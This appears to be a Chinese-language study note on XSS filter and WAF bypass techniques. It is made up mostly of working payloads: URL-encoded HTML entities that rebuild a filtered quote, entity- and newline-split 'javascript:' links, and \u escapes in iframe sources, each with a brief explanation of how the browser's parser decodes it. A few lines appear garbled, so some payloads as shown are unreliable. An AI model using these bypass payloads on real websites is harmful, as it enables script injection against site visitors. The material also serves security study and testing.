wooyun%26%23x27,alert(1)%2b%26%23x27
解码后’,alert(1)’
由于页面对单引号 & 符号 以及 #符号过滤!但是html中可以识别html实体编码!但是实体编码是由&#组成!
这个时候&#已经被过滤 我们只能通过url编码来对 & # 两个符号进行编码!再让浏览器解码成 &# 然后拼接x27 最后就成为了单引号的html16进制编码!
<a href="javascript:%26%23x61;lert(1)">click me</a>
<iframe src="javascript:al\u0065rt(3333)"></iframe>
解码后:我们的提交值为:
alert(1)
二
HTML 编码十进制和十六进制编码的分号是可以去掉的
html编码;还有,数字编码前面加「0」,这也是一条很好的绕过 WAF 的向量
: => [冒号]

 => [换行]
<a href="ڪvasc
ript:alert(1)">click</ a>
三
<a href="javasc
ript:alert(1)">click</a>
首先html编码被还原出来 然后就成了换行 跟冒号
<a href="javasc
ript:alert(1)">click</a>
为什么换行后还能够执行 是因为浏览器中的解析器中词法分析器 起的作用会跳过空白跟换行之类的无效字符。
然后就构造成了一个完整的语句
<a href="javascript:alert(1)">click</a>
代码执行!
看完那些之后瞬间心里觉得原来跟原理性相关的东西真的很重要!能够让你写 xss payload更加灵活!
跳过空白跟换行之类的无效字符。
=======================
为什么换行后还能够执行 是因为浏览器中的解析器中词法分析器 起的作用会跳过换行之类的无效字符。
<a href="jav
asc
ript:alert(1)">click</a>
四
只能解码成一个,才能拼接,
比如 % 解码成 %
不能 %26%23x 解码成 &#x
<a href="javascript:%0a%61l\u0065rt(3333)">click me</a>
五
xss的js的16进制编码用不了